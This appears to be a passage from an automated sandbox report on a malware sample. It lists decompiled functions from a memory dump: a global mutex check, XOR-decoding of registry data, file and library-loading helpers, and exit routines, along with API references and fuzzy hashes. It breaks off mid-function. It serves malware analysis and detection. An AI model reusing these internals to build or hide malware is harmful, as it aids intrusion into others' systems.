GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: cf333e3226fab9769c17989ad9b82f2692150e88c4971a8393785f3e21dadb33
Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
Opcode Fuzzy Hash: cf333e3226fab9769c17989ad9b82f2692150e88c4971a8393785f3e21dadb33
Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0008590C, Relevance: 4.5, APIs: 3, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0x9e684; // 0x28df8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1

Uniqueness

Uniqueness Score: -1.00%

Function 00089B43, Relevance: 3.3, APIs: 2, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				int _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				intOrPtr _t110;
				int* _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E00088604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000895C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00089292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0x9e68c; // 0x28dfab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E00089292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0x9e688; // 0xb0000
						_t128 =  *0x9e68c; // 0x28dfab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0x9e68c; // 0x28dfab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000885C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0x9e68c; // 0x28dfab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E0008C379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E0008861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t110 =  *0x9e68c; // 0x28dfab8
							_t111 =  *((intOrPtr*)(_t110 + 0x28))(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E0008861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E0008861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00089292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0x9e68c; // 0x28dfab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0x9e68c; // 0x28dfab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000895E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000892E5(_v32);
							_v32 = _t179;
							E000885D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E00089256(_v12);
							_v24 = _t147;
							_t148 =  *0x9e68c; // 0x28dfab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E0008861A( &_v32, 0xfffffffe);
							E0008861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00089292(_v12);
						_t171 =  *0x9e684; // 0x28df8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E0008861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}

0x00089b4c
0x00089b4e
0x00089b51
0x00089b53
0x00089b5b
0x00089b5e
0x00089b65
0x00089b6d
0x00089b6f
0x00089b75
0x00089b7e
0x00089b86
0x00089b8c
0x00089b93
0x00089b99
0x00089b9b
0x00089b9e
0x00089ba0
0x00089ba0
0x00089ba0
0x00089ba8
0x00089bab
0x00089bb0
0x00089bb3
0x00089bb6
0x00089bb8
0x00089cee
0x00089cee
0x00089cf4
0x00089cfb
0x00089d3c
0x00089d40
0x00089d41
0x00089d47
0x00089d4c
0x00089d4f
0x00089d4f
0x00089d51
0x00000000
0x00089d51
0x00089d00
0x00089d0a
0x00089d13
0x00089d18
0x00089d1b
0x00089d1e
0x00000000
0x00000000
0x00089d20
0x00089d24
0x00089d25
0x00089d2a
0x00089d2b
0x00089d2e
0x00089d32
0x00089d37
0x00000000
0x00089bbe
0x00089bbe
0x00089bcb
0x00089bd1
0x00089bd4
0x00089bd6
0x00089ceb
0x00000000
0x00089ceb
0x00089bdf
0x00089be3
0x00089beb
0x00089bf2
0x00089bf5
0x00089bf8
0x00089d54
0x00089d57
0x00089d6f
0x00089d72
0x00089d74
0x00089dc8
0x00089dcb
0x00089dcd
0x00089dcf
0x00089dcf
0x00089dd5
0x00089dd8
0x00089dd8
0x00089ddd
0x00089de4
0x00089dea
0x00089def
0x00089df2
0x00089df4
0x00089e0b
0x00089e11
0x00000000
0x00000000
0x00000000
0x00000000
0x00089df6
0x00089df6
0x00089e02
0x00089e06
0x00089e07
0x00089e07
0x00000000
0x00089df6
0x00089d79
0x00089d7d
0x00089d86
0x00089d89
0x00089d8b
0x00089dba
0x00089dbd
0x00089dbf
0x00089dc1
0x00089dc1
0x00089dc3
0x00000000
0x00089dc3
0x00089d8d
0x00089d96
0x00089da2
0x00089dad
0x00000000
0x00089db2
0x00089bfe
0x00089bff
0x00089c02
0x00089c07
0x00089c0b
0x00089c10
0x00089c13
0x00089c16
0x00089c18
0x00000000
0x00000000
0x00089c29
0x00089c31
0x00089c34
0x00089c36
0x00089cab
0x00089cb3
0x00089c38
0x00089c3a
0x00089c49
0x00089c51
0x00089c57
0x00089c5a
0x00089c62
0x00089c65
0x00089c6f
0x00089c72
0x00089c77
0x00089c7a
0x00089c7c
0x00089c7e
0x00089c81
0x00089c83
0x00089c85
0x00089c85
0x00089c83
0x00089c91
0x00089c9c
0x00089ca1
0x00089ca4
0x00089ca4
0x00089cc3
0x00089cc8
0x00089cce
0x00089cd1
0x00089cd3
0x00089cd9
0x00089ce2
0x00000000
0x00089ce8
0x00089bb8
0x00089b77
0x00000000

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6bf1c5b33b10b3526d8cc838c1f8efac37998f2058c898aefa186467c7447f5f
Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
Opcode Fuzzy Hash: 6bf1c5b33b10b3526d8cc838c1f8efac37998f2058c898aefa186467c7447f5f
Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0008A6A9, Relevance: 3.1, APIs: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E0008A63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0x9e684; // 0x28df8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0x9e684; // 0x28df8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E0008861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t60 = E00088604(_t4);
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,028DFD30,00000400), ref: 0008A776

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandleRead
String ID:
API String ID: 2331702139-0
Opcode ID: 61640f5e849e0a484643c7a31dc211f107207d7b7e14cd9ba82bea57b4019d98
Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
Opcode Fuzzy Hash: 61640f5e849e0a484643c7a31dc211f107207d7b7e14cd9ba82bea57b4019d98
Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91

Uniqueness

Uniqueness Score: -1.00%

Function 00085974, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00085974(void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v52;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t27;
				void* _t42;

				_t42 = __edx;
				_v8 = 0;
				E0008A86D( &_v52, __ecx, __eflags);
				_t16 =  *0x9e688; // 0xb0000
				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
					L1:
					_t27 =  *0x9e684; // 0x28df8f0
					 *((intOrPtr*)(_t27 + 0xb4))(0x32);
					goto L1;
				}
				_push(0);
				_push( &_v52);
				_push("\\");
				_v12 = E00089292("Global");
				_t19 = E0008590C(_t18, _t42,  &_v8); // executed
				__eflags = _t19 - 1;
				if(_t19 == 1) {
					CloseHandle(_v8);
					_v8 = 0;
					E0008590C( &_v52, _t42,  &_v8); // executed
				}
				E0008861A( &_v12, 0xffffffff);
				return _v8;
			}

APIs

CloseHandle.KERNELBASE(00085DD4,?,?,?,?,00000002), ref: 000859DD

Strings

Global, xrefs: 000859B3

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID: Global
API String ID: 2962429428-4020866741
Opcode ID: bf963d4d9802a3cf92ade42826878ca464ff62fd084caeceb66e864cea665a67
Instruction ID: ad9e46771b38e1f6345cb022d52bc1c5a3711b7f461b92f87be1531e78fdffdd
Opcode Fuzzy Hash: bf963d4d9802a3cf92ade42826878ca464ff62fd084caeceb66e864cea665a67
Instruction Fuzzy Hash: 42117C72A04118EBDB00FB98ED45CDDB7F8FB90321F20006AF485E7292EA309E00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00085CEC, Relevance: 3.0, APIs: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085CEC() {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t22;
				void* _t33;

				_t8 =  *0x9e688; // 0xb0000
				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000885EF();
				E00088F78();
				 *0x9e780 = 0;
				 *0x9e784 = 0;
				 *0x9e77c = 0;
				E00085EB6(); // executed
				E0008CF84(_t22);
				_t14 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7,  *((intOrPtr*)(_t15 + 0xac)) + 7);
				E0008B337( &_v44);
				memset( &_v44, 0, 0x27);
				E00085C26( &_v44, _t33);
				ExitProcess(0);
			}

0x00085cef
0x00085cfe
0x00085d03
0x00085d08
0x00085d0f
0x00085d15
0x00085d1b
0x00085d21
0x00085d26
0x00085d2b
0x00085d33
0x00085d3d
0x00085d4b
0x00085d53
0x00085d5f
0x00085d67
0x00085d72

APIs

Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8

Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3

Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A

memset.MSVCRT ref: 00085D5F
ExitProcess.KERNELBASE(00000000,?,?,?), ref: 00085D72

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Process$Currentmemset$CloseCreateExitFileHandleHeapModuleNameVersion
String ID:
API String ID: 1180775259-0
Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0008E1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000895C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0008E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000885C2( &_v8);
				return _t25;
			}

0x0008e1bf
0x0008e1c2
0x0008e1c8
0x0008e1ca
0x0008e1cf
0x0008e1d1
0x0008e1db
0x0008e1dc
0x0008e1eb
0x0008e1de
0x0008e1de
0x0008e1de
0x0008e1ef
0x0008e1f6
0x0008e1fc
0x0008e1fc
0x0008e201
0x0008e20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0008A65C, Relevance: 1.5, APIs: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1

Uniqueness

Uniqueness Score: -1.00%

Function 0008A5F7, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x9e684; // 0x28df8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}

0x0008a601
0x0008a615
0x0008a61a
0x0008a623
0x0008a625
0x0008a62f
0x0008a62f
0x00000000
0x0008a635
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371

Uniqueness

Uniqueness Score: -1.00%

Function 0008A63B, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0008A63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}

0x0008a64f
0x0008a652
0x0008a657
0x0008a65b

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720

Uniqueness

Uniqueness Score: -1.00%

Function 00088604, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00088604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
				return _t2;
			}

0x00088612
0x00088619

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82

Uniqueness

Uniqueness Score: -1.00%

Function 000885EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000885EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x9e768 = _t1;
				return _t1;
			}

0x000885f8
0x000885fe
0x00088603

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16

Uniqueness

Uniqueness Score: -1.00%

Function 0008F9BF, Relevance: 1.4, APIs: 1, Instructions: 119
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008F9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0x9e654; // 0x28dfd30
				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0x9e654; // 0x28dfd30
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000886E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E0008109A(_t63, 0x34a);
						_t66 =  *0x9e688; // 0xb0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
